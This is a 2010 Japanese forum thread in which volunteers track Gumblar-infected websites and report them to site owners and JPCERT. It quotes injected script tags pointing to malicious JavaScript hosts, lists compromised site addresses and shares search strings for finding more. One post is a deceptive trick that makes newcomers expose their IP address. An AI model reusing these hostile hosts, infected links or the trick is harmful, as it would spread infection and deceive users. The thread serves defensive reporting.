他のスレに張られた例↓
http://pc11.2ch.net/test/read.cgi/sec/1274675964/
http://hideyoshi.2ch.net/test/read.cgi/download/1273831452/484
http://hideyoshi.2ch.net/test/read.cgi/download/1270411236/705
http://live28.2ch.net/test/read.cgi/livemarket1/1275974928/47
http://live28.2ch.net/test/read.cgi/livemarket1/1275974928/81
http://pc12.2ch.net/test/read.cgi/win/1272505857/80
http://live28.2ch.net/test/read.cgi/news4vip/1275908414/48
前スレにもありましたが、継続的に悪用してる事例↓もありますし、良い知恵はないでしょうか
http://pc11.2ch.net/test/read.cgi/sec/1271787262/926
0639名無しさん@お腹いっぱい。
2010/06/10(木) 20:39:390640名無しさん@お腹いっぱい。
2010/06/10(木) 21:27:11便所の落書きに貼ってあるURLを疑いもせず、いきなり踏むほうにも問題がある。
0641名無しさん@お腹いっぱい。
2010/06/10(木) 21:55:58こっそり修正されていますね
0642名無しさん@お腹いっぱい。
2010/06/10(木) 21:57:27魚拓
http://megalodon.jp/2010-0608-2004-07/www.nagatan.co.jp/
中野スタンピング株式会社
魚拓
http://megalodon.jp/2010-0608-2000-49/www.nsc-com.co.jp/
0643名無しさん@お腹いっぱい。
2010/06/10(木) 22:17:242chに貼ってあるURLは安易に踏んじゃだめだよ
0644名無しさん@お腹いっぱい。
2010/06/10(木) 22:28:32当事者はそれを受けて実際に対応していっている
2ちゃんにしては、えらいまともなスレだと思う
>>638みたいなこと感じたこともない
それに>>638が言ってるのは2ちゃん内でのことでしかない
それに関しては>>640と言える
ウイルス貼るなんて特定の人間だから、自分の時間使って荒らし報告してアク禁に追い込めば?
0645名無しさん@お腹いっぱい。
2010/06/10(木) 22:35:560646名無しさん@お腹いっぱい。
2010/06/10(木) 23:19:310647638
2010/06/10(木) 23:32:11勢いのあるスレでは、まとめサイト含めてページビューは万いきますよね
「安易に踏むのがダメ」で片付けるのはどうなんでしょう
サイト改竄がこれだけあるんですから、一般感染者は数百倍あるかも
前からノートントラップやブラクラスレのURLが悪用されてましたが
Gumblarは性質が悪いです
ここやブラクラスレで張られたURLを含む投稿を
自動的に受け付けないようにできればいいと思ったんですが
自分も時々感染サイトに報告してますし
このスレのみなさんを尊重してますので荒らしとか言わないで
0648名無しさん@お腹いっぱい。
2010/06/10(木) 23:35:23ここはそういうとこじゃないでしょ
他の掲示板ならともかくURL安易に踏んじゃダメってのは2chの基本だよ
0649名無しさん@お腹いっぱい。
2010/06/10(木) 23:41:21セキュリティ関係以外のソフトの話題は板違い。→ 【 Software板 】へ
Winny関連の話題は板違い。→ 【 Download板 】へ
不正アクセスの方法、パスワード・暗号解析など、攻撃方法の話題は禁止です。
荒らし依頼は全ての板で禁止です。
禁止内容の書き込みを発見したら【 削除依頼 】をお願いします。
0650名無しさん@お腹いっぱい。
2010/06/10(木) 23:58:49検体拾って提出して、検出率アップにも貢献してるよ
0651638
2010/06/11(金) 01:22:54ここはネット初めて5日以内に辿り着くような巨大掲示板ですから
それを免罪符にするのはどうかと思いますよ
www.kdash.jpやHONDAが改竄されたように
セキュ意識なくても、大手のホームページ担当できるんですから
一般人が引っかかっても責められないです
このスレに感染URLを報告したら
後々責任を持って悪用されていないか調べて削除依頼するというのは
自分も面倒臭いと思います
●皆さんはこのスレに貼られた感染サイトが悪用されて
Gumblar被害の拡大につながっている可能性は"0"だとお思いですか?
スクリプトとかプログラムで自動的に悪用投稿されないような方法が
あると思ったのですが……
0652名無しさん@お腹いっぱい。
2010/06/11(金) 01:24:570653名無しさん@お腹いっぱい。
2010/06/11(金) 01:34:25仕事でやってようが趣味だろうが責められるべき
0654名無しさん@お腹いっぱい。
2010/06/11(金) 01:43:18自己責任
0655名無しさん@お腹いっぱい。
2010/06/11(金) 02:03:580656名無しさん@お腹いっぱい。
2010/06/11(金) 02:10:09↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓ ↓
■使い方&注意
http://info.2ch.net/guide/faq.html#B4
【タグ使用やリンクはできるの?】
>★ ワンポイント
>リンクの中には、ブラウザクラッシャ(ブラクラ)やPCクラッシャ(コンコン)やエログロ画像等、悪意をこめて貼り付けられたURLがあります。
>被害を未然に防止するためには、むやみにURLをクリックせず、以降の会話の流れやリンク先のソースをブラクラチェッカー等で確認してみてください。
しっかり書いてあるから>>640の通り。以上。
0657名無しさん@お腹いっぱい。
2010/06/11(金) 02:56:47ネット初めて5日ならリカバリも楽じゃね
勉強代としては安い方かと
0658名無しさん@お腹いっぱい。
2010/06/11(金) 05:33:41www●alive-kanmoku●com/bamen-310●html
www●acl-music●jp
www●minatomo●jp/cart/CreProduct●php
iiji●biz/hirameki/
demchik●100free●com/3●html
以上JPCERTに報告済み、ねむい
「acl-music」は通報先にちょっと変わったところを混ぜてみました
0659名無しさん@お腹いっぱい。
2010/06/11(金) 07:27:040660名無しさん@お腹いっぱい。
2010/06/11(金) 08:17:570661名無しさん@お腹いっぱい。
2010/06/11(金) 09:21:42まぁどうせコンパネで消すけど……
それにしても出現からもうすぐ一年経つのに「クリーンインストール」っていう最終手段しか感染した場合の対処法の無いヤツも珍しい
スレで報告されてるのが全部じゃないだろうし、いつになったら決着付くのかねぇ
0662名無しさん@お腹いっぱい。
2010/06/11(金) 09:45:29他のブラウザ用を選んでIEを選択すれば大丈夫
それだとgetplus不用でgoogleちゃんもついてないオフライン版をゲットできる
ただし、オフライン版は、更新がAdobe DLM版よりおそく、DLM版公開後1日〜数日後になったりする
0663名無しさん@お腹いっぱい。
2010/06/11(金) 09:47:03http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe
http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
http://download.macromedia.com/pub/flashplayer/current/uninstall_flash_player.exe
直リン
0664名無しさん@お腹いっぱい。
2010/06/11(金) 11:12:08www●maple-k●com
0665名無しさん@お腹いっぱい。
2010/06/11(金) 11:34:27ttp://dreamweavermx2.biz/jp/support/flashplayer/ts/documents/tn_15507.htm
Player のバージョンが10.0.45.2なのと更新日:2010年2月12日というのはなんとかならんのかw
0666名無しさん@お腹いっぱい。
2010/06/11(金) 12:16:46え?
0667名無しさん@お腹いっぱい。
2010/06/11(金) 12:48:120668名無しさん@お腹いっぱい。
2010/06/11(金) 12:59:52. ィ
._ .......、._ _ /:/l!
:~""''.>゙' "~ ,、、''‐'、| _
゙、'、::::::ノ:::::::_,.-=. _〜:、 /_.}'':,
``、/:::::::::__....,._ `゙'Y' _.ェ-、....._ /_゙''i゙ノ、ノ またまたご冗談を
,.--l‐''"~..-_'.x-='"゙ー 、`'-、 ,:' ノ゙ノブ
" .!-'",/ `'-‐'') /\ `/ でノ-〈
.-''~ >'゙:: ‐'"゙./ ヽ.,' ~ /
//::::: ', / ,:'゙
0669名無しさん@お腹いっぱい。
2010/06/11(金) 13:00:100670名無しさん@お腹いっぱい。
2010/06/11(金) 13:13:50またまたご冗談をw AA略
0671名無しさん@お腹いっぱい。
2010/06/11(金) 13:50:470672名無しさん@お腹いっぱい。
2010/06/11(金) 14:42:45www●movecafe●com
0673名無しさん@お腹いっぱい。
2010/06/11(金) 14:57:18>>671
メル凸済み、反応待ち
0674名無しさん@お腹いっぱい。
2010/06/11(金) 14:57:25あれ?
0675名無しさん@お腹いっぱい。
2010/06/11(金) 15:10:35メル凸済み、反応待ち
0676名無しさん@お腹いっぱい。
2010/06/11(金) 16:44:060677名無しさん@お腹いっぱい。
2010/06/11(金) 16:48:17どうなってんだ
0678名無しさん@お腹いっぱい。
2010/06/11(金) 17:04:55Gred、Dr.Webともに反応せず
お手隙の方、精査よろしくです
0679名無しさん@お腹いっぱい。
2010/06/11(金) 17:47:23確認できないけど
0680名無しさん@お腹いっぱい。
2010/06/11(金) 18:30:35変なエロサイトみて適当にクリックしてたら三分おきに↑の画像が表示されるようになったんだけど解決策ありませんか? 正直うっとおしいです・・・
0681名無しさん@お腹いっぱい。
2010/06/11(金) 18:32:41・・・じゃなくてスレ違い
0682名無しさん@お腹いっぱい。
2010/06/11(金) 18:40:58他人事みたいな口ぶりが多いよね
0683コテハン ◆8080adndqg
2010/06/11(金) 18:42:51www●hd-cre●com/bj-fh ←eval(base64_decode・・ なんだこれ?
※www●hd-cre●com/より下の階層はたぶん全滅
www●saiwai-estate●net ←再掲載(絶賛放置中)
blog●mensura-zoili●com/archives/2
seikon●nes3●com
凸してくれてる人>乙です
0684680
2010/06/11(金) 19:13:20ちなみにサイトはココです
0685名無しさん@お腹いっぱい。
2010/06/11(金) 19:39:162ちゃんねる初心者ですか?
書き込む前にSG(セキュリティー・ガード)に登録しないと危険ですよ。
SGに登録せずに書き込んだ場合、
あなたのパソコンがGumblarに感染させられる恐れがあります。
初期の頃から2ちゃんねるにいる方達はかなりのスキルとこのBBSのコマンドを知っています
ですから簡単にあなたの個人情報等を抜かれ、Googleストリートビューで自宅まで公開された人も数多くおり
社会的に抹殺されてしまう。それが2ちゃんねるの隠れた素顔でもあります
SGしておけばまず実行される.ru:8080自体が無効になってしまうので
どんな凄腕ハッカーでもでも罠URLを踏ませる事ができなくなります
SGに登録する方法は、名前欄に「 fusianasan 」と入れる。
これでSGの登録は完了します
一度登録すれば、ブラウザを閉じない限り継続されます。
2ちゃんねるはルールさえ守れば危険な場所ではありません。
しかし悪意を持った人間も確かに存在します。気を付けて下さいね。
fusianasanは、正式にはフュージャネイザン、
又はフュジャネイザンと読みます。
元々はアメリカの学生達の間で、チャットの時に
セキュリティを強化する為に開発されたシステムです。
fusianasanを掲示板に組み込むのは結構面倒なのですが、
2ちゃんにカキコしてたらウィルスに感染したとか、
個人情報が漏れた等の抗議がうざったくなったひろゆきが、
仕方なく導入しました。
悪意のある人間にクラックされる前にSGを施す事をお勧めします。
0686名無しさん@お腹いっぱい。
2010/06/11(金) 19:45:04user1.matsumoto.ne.jp/~goma/js/base64.html
>>685
そのIP暴露方法、まだ有効だったのかw
0687名無しさん@お腹いっぱい。
2010/06/11(金) 19:50:04いわゆるサイト改竄ではないのでスレチ
鑑定スレに行け
068959.106.108.43
2010/06/11(金) 20:24:00代行でGumblarリンク張る奴もいるからね
http://sports2.2ch.net/test/read.cgi/operatex/1274500251/366
http://anchorage.2ch.net/test/read.cgi/siberia/1274857287/410
http://yutori.2ch.net/test/read.cgi/morningcoffee/1273586556/744
Gumbla拡散に利用されて平気なの?
0690名無しさん@お腹いっぱい。
2010/06/11(金) 20:53:51コンパネで消した方がいい?
0691名無しさん@お腹いっぱい。
2010/06/11(金) 21:06:110692名無しさん@お腹いっぱい。
2010/06/11(金) 22:32:55ここ見たらいいんじゃね
http://wiki●higaitaisaku●com/wiki.cgi?page=%B0%AD%BC%C1%A5%EF%A5%F3%A5%AF%A5%EA%A5%C3%A5%AF%BA%BE%B5%BD%A5%B5%A5%A4%A5%C8%A4%CE%A5%B9%A5%D1%A5%A4%A5%A6%A5%A7%A5%A2
0693名無しさん@お腹いっぱい。
2010/06/11(金) 22:51:11気にする必要ないと思われ
0694名無しさん@お腹いっぱい。
2010/06/11(金) 22:54:49おれもそのファイルできてたけど
中に誰もいませんよ
0695名無しさん@お腹いっぱい。
2010/06/12(土) 01:02:42いつのまにFlashにP2P機能がついたんだよ
0696名無しさん@お腹いっぱい。
2010/06/12(土) 02:09:20・JR東日本 ・ホンダ ・ローソン ・京王電鉄 ・小林製薬 ・ハウス食品
・ラジオ関西 ・洋菓子販売のモロゾフ など多数
0697fusianasam
2010/06/12(土) 08:39:170698名無しさん@お腹いっぱい。
2010/06/12(土) 11:25:06去年の9月くらいに気がついたんだけど
yimg.jpとかのFLASHでUPnPにアクセスしてたわ
今までは勝手にルーターのポート開放してたのか
0699名無しさん@お腹いっぱい。
2010/06/12(土) 14:29:01Web ページの自動転送、再読み込み禁止で警告させることは
出来ないのでしょうか
0700名無しさん@お腹いっぱい。
2010/06/12(土) 15:42:00http://blog.trendmicro.co.jp/archives/2729
0701名無しさん@お腹いっぱい。
2010/06/12(土) 16:11:38kazoeru■com
誤爆すんなksg
0702名無しさん@お腹いっぱい。
2010/06/12(土) 16:24:38P2P機能がついたりストリーミング機能ついたりして直接ネットワークアクセスなんてされたら、
どんなバグが潜んでるかかわからん
0703名無しさん@お腹いっぱい。
2010/06/12(土) 17:18:40なにそれこわい…
>>701
http://www.virustotal.com/jp/analisis/613e307ea2d0993c75f4494e4061e520e2069d6aeee5834352d0ec9fc47c7c96-1276329681
AviraとKasperskyに検体を提出、返事待ち
0704名無しさん@お腹いっぱい。
2010/06/12(土) 17:37:38しかも更新はせざるを得ない、しかし更新してもP2Pでポートに穴開けられる
どっちに進んでもPC詳しくない一般人には地獄だなコレ
0705名無しさん@お腹いっぱい。
2010/06/12(土) 17:40:33穴開けられる可能性あるのかな。
0706名無しさん@お腹いっぱい。
2010/06/12(土) 17:55:34多少不便にはなるかもしれないがセキュリティにはかえられない
0707コテハン ◆8080adndqg
2010/06/12(土) 18:05:06www3●pf-x●net/~lau ←絶賛放置中
8080のコードがぶった斬られて
<script type="text/javascript" src="http〜中略〜.js"></script>
なんだこれ?
www●creativeholic●sakura●ne●jp/creativeholic/ ←web屋 カスがw
ここにも<script type="text/javascript" src="http〜中略〜.js"></script>
houritusoudan●net/
やっぱり<script type="text/javascript" src="http〜中略〜.js"></script>が入ってる
0708コテハン ◆8080adndqg
2010/06/12(土) 18:10:13【陥落サイトのURL悪用厳禁】
www●aoyamabc-online●com/
↓
</html>
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--06f0d0ddde5fbe2387a6bdb4452f234a-->
8080がコードを変更した可能性あり。
0709コテハン ◆8080adndqg
2010/06/12(土) 18:34:37www●hekimen-ryokuka●com/rss/index●php ←今までのやつ
www●7500zei●com/ ←例のHP更新代行業者
↓
</html>
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--d2392c04537c5eaf61fe86d1998535a1-->
katusika●net/base/
↓
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--7e388d5d98d4fbb4bc9eb21bd27c9815-->
0710名無しさん@お腹いっぱい。
2010/06/12(土) 18:49:19利便性と両立できないようなセキュリティ対策はゴミだよ。
0711名無しさん@お腹いっぱい。
2010/06/12(土) 19:12:490712コテハン ◆8080adndqg
2010/06/12(土) 20:03:21新型8080(?)っぽいやつ
<script type="text/javascript" src="http〜中略〜.js"></script>
<!--32文字の英数字-->
↓
canyonhardware●com
d-pic●net/repo/index●html ←絶賛放置中のとこ
電話用のサイトだが・・・
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392
コードがHEXされとるのがあった
0713名無しさん@お腹いっぱい。
2010/06/12(土) 20:37:30動画サイト見ないやつはべつにいいだろ
0714コテハン ◆8080adndqg
2010/06/12(土) 20:57:42訂正
no9-bbs●appspot●com/687474703A2F2F6770696E64792E636F6D2F30312F31392F
末尾のFが脱落してたorz
0715名無しさん@お腹いっぱい。
2010/06/12(土) 23:34:16コンテンツをフラッシュ内リンクでしか表示しないクソサイトも結構多いんだ。
見なくて済むなら即Uターンなんだが、施設の予約とかどうしようもなかったり、
特にウェザーニューズがな…。
0717名無しさん@お腹いっぱい。
2010/06/13(日) 01:49:01あそこは色々な意味で期待を裏切りません
いろいろ忙しくて報告が遅れちゃったので詳細は端折りますけど、
>>701-714までにあるURLは報告済みの反応待ち
これからチェックしようと思ったんですが、Gredがちょっとご機嫌斜め
うまくいかないもんですねえ…
0718コテハン ◆8080adndqg
2010/06/13(日) 04:09:23【陥落サイトのURL悪用厳禁】
tw13●net/vogue/S-MX/index●html ←相変わらず絶賛放置中
8080のコードが途中でぶった斬られて
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/OCR●js"></script>
<!--b8bc4160235ef97212335c7af60aeda7-->
houritusoudan●net/
↓
<script type="text/javascript" src="http://blog●bigsophieblog●com/Finder●js"></script>
<!--3edc66f8132dfa1d633ac8c343d2e74e-->
謎の新型の飛び先は
blog●bigsophieblog●com/〜.js
sogpaoiy●the-mlmpowercall●com/〜.js
この2つに集中してるみたい(現時点では)
お馴染みの激しい難読化されたやつ
shabao●com/public_html/top_footer ←既出だったかな?
www●saihu-shop●com/rss/index●php
あきた(から)ねる・・
0719名無しさん@お腹いっぱい。
2010/06/13(日) 16:30:21どうやって感染サイト探してるの?
虱潰し?
とにかくすごいね
0720名無しさん@お腹いっぱい。
2010/06/13(日) 16:38:490721名無しさん@お腹いっぱい。
2010/06/13(日) 16:43:16なるほど
0722名無しさん@お腹いっぱい。
2010/06/13(日) 16:45:56http://internet.watch.impress.co.jp/docs/news/20100611_373777.html
これはAdobe AIRにもFlashゼロデイ攻撃の脆弱性が含まれてたということだよな
0723名無しさん@お腹いっぱい。
2010/06/13(日) 17:00:08ゼロデイ状態でも一月くらい平気で待たすし
0724名無しさん@お腹いっぱい。
2010/06/13(日) 17:33:35さっそく弄ってきたw
0725名無しさん@お腹いっぱい。
2010/06/13(日) 17:35:27新型avast!反応しないね(´・ω・`)
0726名無しさん@お腹いっぱい。
2010/06/13(日) 17:48:450727名無しさん@お腹いっぱい。
2010/06/13(日) 18:38:48新型はリダイレクト先が
blog●bigsophieblog●com/
sogpaoiy●the-mlmpowercall●com/
この2つに集約されてるから、hostsファイルで簡単に蹴れる
ドメインが増えたら抜けちゃうけどなw
0728名無しさん@お腹いっぱい。
2010/06/13(日) 20:40:59市場独占してるからってふんぞり返って
世界に流通してるソフトのセキュリティを疎かにするってのは
世界中にウイルスを広がらせて打撃を与えてるってのと同義なのにね
ウイルスばらまく連中と大差ない、むしろ一般人にはクリーンを装ってる分それ以上か
0729名無しさん@お腹いっぱい。
2010/06/13(日) 21:05:500730名無しさん@お腹いっぱい。
2010/06/13(日) 23:57:20ttp://yutori7.2ch.net/test/read.cgi/campus/1275391180/105
ttp://changi.2ch.net/test/read.cgi/cchara/1274810547/877
ttp://changi.2ch.net/test/read.cgi/wcomic/1274275657/521
ttp://yutori7.2ch.net/test/read.cgi/soccer/1274426256/701
ttp://pc11.2ch.net/test/read.cgi/sec/1268032521/571
ttp://yutori.2ch.net/test/read.cgi/nhk/1269009072/51
↑悪用が収まらないので感染中のURL晒すのは止めたらいかがですか?
ウイルスばらまく連中に利用されてるように思います
0731名無しさん@お腹いっぱい。
2010/06/14(月) 00:16:26そして、このスレはちゃんと鯖管に通報したりしてますよね
>>730のリンクのスレにこのスレのリンクを貼って
対策を促せばいいんじゃないでしょうか
0732名無しさん@お腹いっぱい。
2010/06/14(月) 00:48:39「自己責任」という言葉はご存知無いのでしょうかネ?
>>656が書いてるように、2ちゃんねるの使い方&注意 http://info.2ch.net/guide/faq.html#B4 には
>被害を未然に防止するためには、むやみにURLをクリックせず (中略) 転んでも泣かない。。。
貼ってあるURLを疑いもせず、いきなり踏むほうにも問題があります。
>>640も書いてますね。
取説をしっかり読んでから文句を言って下さい。
踏まされて悔しかったら、涙を拭いて…クリーンインストール後に>>4を実施しましょう。
因みに、http://gw.aguse.jp/ を通せば、何が仕掛けられていてもPCには影響が無いので覚えておいて下さい。
aguseはブックマーク推奨ですよ。
0733名無しさん@お腹いっぱい。
2010/06/14(月) 01:43:23つ「鏡」
0734名無しさん@お腹いっぱい。
2010/06/14(月) 13:12:03踏むものがブラクラからウイルスに変わっただけ
0735名無しさん@お腹いっぱい。
2010/06/14(月) 13:58:57だが、SonicWallのゲートウェイAVがGumlar_7として反応する。
しかし、ソースをみてもそれらしきものがみあたらん。
ちなみにウイルスバスターも反応しない。
SonicWall抜きでアクセスしても飛ばされた様子もない。
やられてますかね?
0736名無しさん@お腹いっぱい。
2010/06/14(月) 14:06:36フレームしか無いシンプルなトップにおもいっきりあるじゃんか
0737735
2010/06/14(月) 14:21:02ありがとう。逝ってきます・・
一応電凸しておいた。
「またでいすか?」という反応だった。
0738名無しさん@お腹いっぱい。
2010/06/14(月) 19:00:57www●yosegi●jp
0739名無しさん@お腹いっぱい。
2010/06/14(月) 20:07:54お前いいかげん、うぜえよ
0740名無しさん@お腹いっぱい。
2010/06/15(火) 00:41:08で、その鯖缶のサイトトップが改竄されてたようなんだが、これは自分は感染してないと見てOK?
0741名無しさん@お腹いっぱい。
2010/06/15(火) 01:34:21とりあえずスキャンしろ
0742夷塚 ◆y0JEaK6O/gDf
2010/06/15(火) 02:43:36>>740
不安に思ったら迷わずスキャンしたほうがいいですよ
それほど手間の掛かる作業でもありませんしね
>>735
メル凸しておきましたと事後報告
Gredで覗いた限りでは綺麗になってますね
>>738
メル凸しました
ついでにJPCERTに報告、Aviraに検体提出済み
0743名無しさん@お腹いっぱい。
2010/06/15(火) 08:13:56これも8080系
0744名無しさん@お腹いっぱい。
2010/06/15(火) 10:31:30それともウイルス自体埋め込みだから「感染した!」って解らない?
後者なら恐ろし過ぎるな、普段見てるページすら安心して出歩けないじゃん
過去ログ見る限りレジストリまで弄らないと対策不十分とまで言われるみたいだし
そこまで徹底しないとダメなんじゃあ今も感染が広がるのも納得
0745名無しさん@お腹いっぱい。
2010/06/15(火) 10:47:41検索して飛んだサイトから
そのドメインにリダイレクトされてびびったわ
FWでブロックしてたから接続されなかったけど
0747名無しさん@お腹いっぱい。
2010/06/15(火) 13:22:45> そういや最近のGumblerだと対策せず感染したページ見たらウイルスをなすりつけてくるページに飛ばされるのかな?
前のを知ってるならレス見てればわかると思うけど変わってないよ
レジストリまで確認しなきゃいけないのは稀な例で一般的にはそこまで必要ない
だいたいハンパなJREが入っていることの方が多い
サイト管理者が感染しても仕方ないという理由にはならないね
0748名無しさん@お腹いっぱい。
2010/06/15(火) 13:53:13com:8080な件
0749名無しさん@お腹いっぱい。
2010/06/15(火) 14:54:55そのJREがコンパネで消しただけじゃダメだからアレなんじゃないの?
感染するのはホームページ持ってるユーザーだけじゃないし、
一般人にはコンパネで消した後も残骸が残ってる、しかも残ってる場所が1つの誤削除でPC動かなくなるかもしれないレジストリなんて予想だにせんよ
0750名無しさん@お腹いっぱい。
2010/06/15(火) 15:10:59一部のメーカー製PCだけプリインストールされてる古いバージョンが消せないってだけで
通常はそんなのないです
0751名無しさん@お腹いっぱい。
2010/06/15(火) 15:43:06このサイトのカーソルを当ててなくても波紋が出るならアウト
危険なサイトじゃない安心しろ一応
http://www.geocities.jp/saaikoka/omosiro/omosiro28.htm
0752名無しさん@お腹いっぱい。
2010/06/15(火) 15:46:01通常は、って言ったところで対象にはあるじゃん
プリインストール版はコンパネで消して、見た目は消えてても消した事にならないとか書いてないから被害広がってるところあるんじゃね?
ホントに根絶やしにしたいならそういうところもテンプレ徹底しなくちゃ
0753名無しさん@お腹いっぱい。
2010/06/15(火) 16:47:52どうしてもってならお前がテンプレ作れ
0754夷塚 ◆y0JEaK6O/gDf
2010/06/15(火) 17:29:42さくらインターネット、JPCERTに報告済み
Aviraに検体を提出しました
ttp://yamagata.int21h.jp/tool/GumblarChk/
こんなツールあったんですね
0755名無しさん@お腹いっぱい。
2010/06/15(火) 18:00:20自己防衛が目的であって根絶やしなんていう非現実的なものは目標ではないんだけど
テンプレおねがいしますね
0756名無しさん@お腹いっぱい。
2010/06/15(火) 19:20:27すごいけど、3月から更新無いね
現在のものには無力じゃないかな?
0757コテハン ◆8080adndqg
2010/06/15(火) 20:03:40--
http://www.google.co.jp/search?hl=ja&source=hp&q=%22src%3D%22%2B%22http%3A%2F%2F%22%2B%22.ru%22OR%22.info%22OR%22.at%22OR%22.com%22%2B%22%3A8080%2F%22%2B%22.js%22%2B%22%3C%5C%2Fscript%3E%3C%22+-JScript+-localhost+-Analyzer+filetype%3Ahtml
色々試したけど、まったく釣れない・・orz
0758夷塚 ◆y0JEaK6O/gDf
2010/06/16(水) 04:57:20サイト構成やリンク先、スクリプトの一覧を一気に把握できるので、
意外と使い方次第かもしれない…とか思ってみたり
>>757
お疲れ様です、検索ワードが苦戦のほどを物語ってますね…
こちらもほぼお手上げ状態、何か良い方法はないものか
0759名無しさん@お腹いっぱい。
2010/06/16(水) 07:10:120760名無しさん@お腹いっぱい。
2010/06/16(水) 16:15:554亀やられてる?
0761夷塚 ◆y0JEaK6O/gDf
2010/06/16(水) 16:30:270762名無しさん@お腹いっぱい。
2010/06/16(水) 16:36:25|___ミ⌒ヽペタン
| ⌒)ノ ペタン
._ノ ) ((
| .・∀| ( 嘘ヽ
|__| | ̄ ̄ ̄|
/ > . | |
""""""""""""""""""""
0763名無しさん@お腹いっぱい。
2010/06/16(水) 17:10:03gredとAguseは無反応
Dan's View Sourceで見る限りあやしいコードは無さそうだけど?
あと、ここは鑑定スレじゃない
0764名無しさん@お腹いっぱい。
2010/06/16(水) 19:02:30結局Gumblerスレあるのここだけだし
初心者もここにすがるしかないんよね
0765名無しさん@お腹いっぱい。
2010/06/16(水) 19:04:17http://gimpo.2ch.net/test/read.cgi/qa/1274878983/
ここでいいじゃん
0767名無しさん@お腹いっぱい。
2010/06/16(水) 23:16:48不安ならアンインストールw
0768名無しさん@お腹いっぱい。
2010/06/16(水) 23:51:32怪しい確認方法よりスキャンのがはるかに良い
0769名無しさん@お腹いっぱい。
2010/06/17(木) 03:33:11これでウィルスなくなってる?
0770名無しさん@お腹いっぱい。
2010/06/17(木) 07:34:59出現からもうすぐで一年になるのに感染したらこれしかないとか・・・
0771名無しさん@お腹いっぱい。
2010/06/17(木) 08:07:270772(VдV) ◆yUyb3Tqn92
2010/06/17(木) 08:25:47( ´,дゝ`)俺様こそがまさにウィルス貼りまくってる張本人だがなにか文句でも?
まるでこのスレの住人が同罪みたいな言いようだが、正確には共犯者なのだお( ´,дゝ`)ウフ
それにお前のような奴がいるからやめられねぇ「踏ませ」はな(VдV)v
0774(VдV) ◆yUyb3Tqn92
2010/06/17(木) 08:30:25はい。調子に乗り乗りな気分です。
次スレでも同じことをするつもりです。
このスレの削除依頼出した奴、無駄な努力お疲れ。
(VдV)調子に乗り乗りの気分です(VдV)
0775名無しさん@お腹いっぱい。
2010/06/17(木) 08:52:44Gredは単純に「危険です」で教えてくれるんだろうけど、aguseは見るところ多すぎてゴチャゴチャでワケワカメ
0776(VдV) ◆yUyb3Tqn92
2010/06/17(木) 09:39:15(*VдV*)最近心がとても穏やかだぜ俺!!
悪意を持って悪をなしてたのに最近は天使のような心で悪をなしているお!!!
(V`д´V)こ!このままでは!天使になってしまうではないかー!
0777(VдV) ◆yUyb3Tqn92
2010/06/17(木) 09:39:56新宿VIPクリスタル行ってこよっと( VдV)
0778名無しさん@お腹いっぱい。
2010/06/17(木) 09:56:45確かにわかりにくいよね
0779名無しさん@お腹いっぱい。
2010/06/17(木) 22:35:52アンチウィルスソフトにドライブバイダウンロード用のダウンローダが検出されたら
0780名無しさん@お腹いっぱい。
2010/06/17(木) 22:39:360781名無しさん@お腹いっぱい。
2010/06/17(木) 23:11:08取得画像の下にGumbler感染してる可能背がありますってでるぞ
0782名無しさん@お腹いっぱい。
2010/06/17(木) 23:31:52そういうのは一時的にわかったとしても
1時間後には変更されてるかもしれないから意味がない
0783名無しさん@お腹いっぱい。
2010/06/18(金) 08:58:320784名無しさん@お腹いっぱい。
2010/06/18(金) 11:09:59www●sakaue-farm●co●jp
農業IT化したらウィルス(害虫)にやられてたでござる
0785夷塚 ◆y0JEaK6O/gDf
2010/06/18(金) 15:05:55www●aguse●jp/?m=w&url=www●value-2han●com
> Trojan.JS.Iframe.mi
> temp●hbsouthmomsclub●com:8080/Website●js
警察庁に通報しました
>>784
www●aguse●jp/?m=w&url=www●sakaue-farm●co●jp
メル凸に反応した様でござる、「403 Forbidden」
[補足]
www●value-2han●com
http://www.virustotal.com/analisis/eba1f66d999a07fb74a3d32ec27cf59777ea07ddfcd2dffe3c122f2ea51626e0-1276835405
(com:8080/.jsを落とせず…aguse判定ではサイト消失っぽい)
↓
zbestfilm●net/media/kal/index●php
http://www.virustotal.com/analisis/6ce551224d79142bf877b8003fa0cee6a3bec0d478327537893fb48c7d6f1558-1276835152
↓
id40478●srvdata●ru/mif●js
http://www.virustotal.com/analisis/c42d6f6dfa044de4ff12bc8dd4e37418d5f6dec95e43a387798c999cf6edab0b-1276834287
0786名無しさん@お腹いっぱい。
2010/06/18(金) 17:08:26www●dord●co●jp
深海調査のエキスパートねぇ…
0788八頭 ◆YAGApwSaEw
2010/06/18(金) 22:01:30お疲れ様
リアルタイムで危険性を痛感している方が指摘する、「オープンなやりとりは危険を伴う」という意見にも頷けるので
僕はここを「無いよりはマシな程度」の存在にすぎないと思ってます(早い話が必要無い派です)
0789夷塚 ◆y0JEaK6O/gDf
2010/06/19(土) 05:39:37という意味で書いたのですが、読み返すと日本語おかしいですね
気が緩んでいたかな…申し訳ありません
>>788
まさか八頭氏からご指名とは驚きました
俺は「必要なくなる日が来るといいなあ」以上の事は考えてませんよ
0790名無しさん@お腹いっぱい。
2010/06/19(土) 12:16:04このスレのテンプレ見て踏んで被害者が増えない事を祈るのみ
あと運営仕事しろ
0791コテハン ◆8080adndqg
2010/06/19(土) 14:28:12www●leclat●net/blog/
0792コテハン ◆8080adndqg
2010/06/19(土) 15:03:56確かに面倒なのでs・・orz
ttp://www.google.co.jp/search?q=%22.com%3A8080%2F%22%2B%22Access_Point.js%22+OR+%22Backup.js%22+OR+%22Cable_Modem.js%22+OR+%22Data_Type.js%22
+OR+%22Default.js%22+OR+%22Del.icio.us.js%22+OR+%22Finder.js%22+OR+%22Gigahertz.js%22+OR+%22Gnutella.js%22
ttp://www.google.co.jp/search?hl=ja&q=%22.com%3A8080%2F%22%2B%22Hard_Copy.js%22+OR+%22Hardware.js%22+OR+%22HDMI.js%22+OR+%22JPEG.js%22+OR+%22
Kbps.js%22+OR+%22Kibibyte.js%22+OR+%22Link.js%22+OR+%22Name_Server.js%22+OR+%22Null.js%22+OR+%22OASIS.js%22+OR+%22Open_Source.js%22
